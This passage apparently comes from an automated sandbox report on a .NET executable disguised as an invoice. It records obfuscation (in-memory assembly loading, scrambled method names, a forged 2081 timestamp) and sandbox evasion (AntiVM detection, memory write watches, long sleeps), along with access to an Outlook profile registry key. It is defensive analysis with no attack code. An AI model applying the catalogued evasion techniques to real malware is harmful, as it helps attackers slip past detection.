Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Factura 1-2501377.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Factura 1-2501377.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Factura 1-2501377.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Factura 1-2501377.exe, CalendarForm.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs .Net Code: lZc6wA6gIFJfr2QhCD0 System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: Factura 1-2501377.exe Static PE information: 0xD1A76EBF [Tue Jun 17 18:36:47 2081 UTC]
Source: Factura 1-2501377.exe Static PE information: section name: .text entropy: 7.816759184598052
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, c6rbuFHNyCPlrGBq3R.cs High entropy of concatenated method names: 'rALykqSX1c', 'meLyKFFaBL', 'PfIyqIFdth', 'cpoyWH4LGL', 'h3SyZ8O5B8', 'RuOySg8k02', 'KlmyjRHTvJ', 'n45ygul6Yp', 'eBOyCxE8qd', 'mqwyXIU7wa'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, C4x3ErkRuln6Htq1Kq.cs High entropy of concatenated method names: 'asAJcArsfr', 'cuVJ2fU9nk', 'dZOJahsp5D', 'QZXJ4y7uB6', 'pu7JLynKex', 'GURJFOvV51', 'JHuJAd1qI1', 'F3BJG9fTKi', 'MPRJYCNiUY', 'UGOJiSCwED'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, eYupwL4gJSmoutEVBs.cs High entropy of concatenated method names: 'LsEMhf3nAd', 'uHIMrF50Ms', 'ToString', 'u2qM6XcToG', 'zfOMJTPEJs', 'byvM5MSPZC', 'QnRMtdqYqc', 'vQoMbNjLBO', 'xbmMpeVJVB', 'u3OM84NaHV'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, jqwgTuDHipN6pOwxC9.cs High entropy of concatenated method names: 'bWlPp4x3Er', 'FulP8n6Htq', 'QDgPh8gsol', 'KhDPrArMOB', 'MqlP9CIVsv', 'lRSPENhAGL', 'gPuoGBmUFnSWOVYvgw', 'CdIPtaAflAjIr2TXnw', 'MfoPPkkpnS', 'fbYPs1LD0N'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, tiAGDHKDg8gsoljhDA.cs High entropy of concatenated method names: 'kZL5TPur95', 'yR25f4igjT', 'Vw15koIIX5', 'INH5KFNoiM', 'WEL59KS3Ro', 'mNy5ElH2nf', 'ebL5MJI908', 'MiJ5xGcJ5I', 'kCE5ergsps', 'MDN5vhvE2c'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, l7C8eWUMNc9FFsXCVX.cs High entropy of concatenated method names: 'inJpBJbiaI', 'f7XpQHdosq', 'MUwpd41iYd', 'Gv5pT2MeH1', 'yoRpumxR7H', 'nrWpfv76mB', 'ujDpldBenY', 'Ug4pk8iUSg', 'g3KpKgsQ6x', 'f5upRB3Krg'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, iEFCbvFi6nqL55VIYF.cs High entropy of concatenated method names: 'usLMG3JCBu', 'rOtMiZLPML', 'LBCxIqyis4', 'B3yxPa7sFW', 'FJYMXG69At', 'rUPMmvefyq', 'Ii3MHg7ZUQ', 'IEjMc1FOhe', 'c6IM27SNKf', 'BBRMaBhfgD'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, v6Op69aVJGU8GPg0UT.cs High entropy of concatenated method names: 'ToString', 'efvEXwCgrr', 'BbYEWiRTtd', 'BFoEnZFYRT', 'kBwEZn23mM', 'wxuESMSRbu', 'wYbEOyFsNV', 'DiXEjCrFjc', 'xP3EgD5WNp', 'VKAEUlHcbI'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, EgKQyecTP8M0OmBv7M.cs High entropy of concatenated method names: 'BJ29CCuueG', 'TL89mVMlkq', 'AOV9csO0fX', 'tnj92PERAm', 'dl39WYaNuB', 'nVn9ngSZFv', 'Pg19Z9SXOx', 'Oar9SqtWa3', 'HwQ9Oy9yyB', 'KGd9jDFHy7'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, vvrutK18U1b0URP6d8.cs High entropy of concatenated method names: 'dj2diIo2A', 'tygTCN6Ma', 'vtqfK4dWJ', 'p3slBNar6', 'N4pK0E8xD', 'nFuRfOCJq', 'C0yFFBrcb1NywMMJ12', 'K6LqfF0IjUtVnLceyF', 'y8bxLOceV', 'eXtvBF0Vb'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, RY6bLdPPCZwj1NSuoRG.cs High entropy of concatenated method names: 'ohXviwwDHn', 'qoTvzXOQEv', 'KnB3Ivtjiy', 'vQf3P75vbe', 'MDx315KWXh', 'XL83swwccb', 'vN93De4mp2', 'UQM37vexJ6', 'kqt36ymaQT', 'iRS3JjYxPT'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, kAijNbzXUCEL3vXSxn.cs High entropy of concatenated method names: 'kbnvfJ2C8H', 'nPHvkbcTmf', 'iA4vKURMfN', 'nu5vqLkChh', 'x0CvWs413l', 'LI9vZgZ4Ql', 'n5tvSW0hZw', 'aTyvVN5Rpw', 'nEjvBRI1U0', 'OchvQh0sal'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, rXyvFNiV2f2oCJOOO0.cs High entropy of concatenated method names: 'PWLv5ttrRw', 'NENvt46cD8', 'ckZvbkyqrX', 'Nkrvp83xBX', 'lrfverXARA', 'HPZv87Dqf4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, xsvhRSqNhAGLsl0Buw.cs High entropy of concatenated method names: 'J9Hb7kcDhk', 'GFnbJe3yAU', 'DM9btoQF6p', 'kcJbpSUuAl', 'kNlb8GpY4V', 'nMBtL9rYe7', 'ML6tF2iCwr', 'ou6tAtTpVn', 'zCgtGWfd18', 'vLVtYEBp1E'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, chxL3BJejmNsKOe7cT.cs High entropy of concatenated method names: 'Dispose', 'eMEPYRarde', 'efS1WXlBWq', 'SRlaIVZVGV', 'o8WPiZfafl', 'cFEPz9Kp3p', 'ProcessDialogKey', 'kAT1IGTHlZ', 'sl11PwSCxm', 'meM11eXyvF'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, jAkcIWAygDMERarde9.cs High entropy of concatenated method names: 'tuve9aqVeA', 'HC0eMf3q6D', 'XnyeeKwC0O', 'jOIe3SncyT', 'txHeNS9AqU', 'S0LeV6TjUc', 'Dispose', 'gkEx6oN5mw', 'r61xJMkoUg', 'QS9x548aen'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, jU4uOl5Ch63WyhBPoT.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dXN1YB5Bef', 'L0P1iCX3qO', 'HDw1zL5dHb', 'NyisI1jUXX', 'gEcsPptV3c', 'W2us1A9UFI', 'd6Wssq37DB', 'd4C44K6aqQHrEVmpj96'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs High entropy of concatenated method names: 'sVFs7l2o3U', 'tRDs6xBd5A', 'i1hsJZ7Qfa', 'ns6s5iTmEN', 'Ky7stbb1sB', 'wYWsbu2dPM', 'RkDspYFidw', 'WJws86lk2b', 'nfPs07s7Ly', 'eRssh1DU0c'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, nMOBFbRtWSlxpgqlCI.cs High entropy of concatenated method names: 'aqetuoCh6y', 'uPRtlJQY97', 'iMr5nARKIZ', 'sDU5ZCd5Mt', 'lXx5SwEeMk', 'krl5OSyEnh', 'Ue15jbexEj', 'y1S5gViIZX', 'TdL5UdSENw', 'pNL5CyBRxj'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, AGTHlZYvl1wSCxmheM.cs High entropy of concatenated method names: 'OaPeqwCZRK', 'XvheWEw5KU', 'XjLenP9KcW', 'TYneZwGnuG', 'caneSLilPl', 'i3UeOS78kY', 'lQYejOnv09', 'YqBegfbaaH', 'ER9eUUcBBl', 'mm7eClw8iI'
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 15B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 2ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 4ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 9160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 7B40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: A160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: B160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 15C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 3020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 2DD0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597249 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597020 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596671 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596452 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595682 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595209 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594927 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594468 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Window / User API: threadDelayed 8289 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Window / User API: threadDelayed 1565 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 6436 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3644 Thread sleep count: 8289 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3644 Thread sleep count: 1565 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598453s >= -30000s Jump to behavior
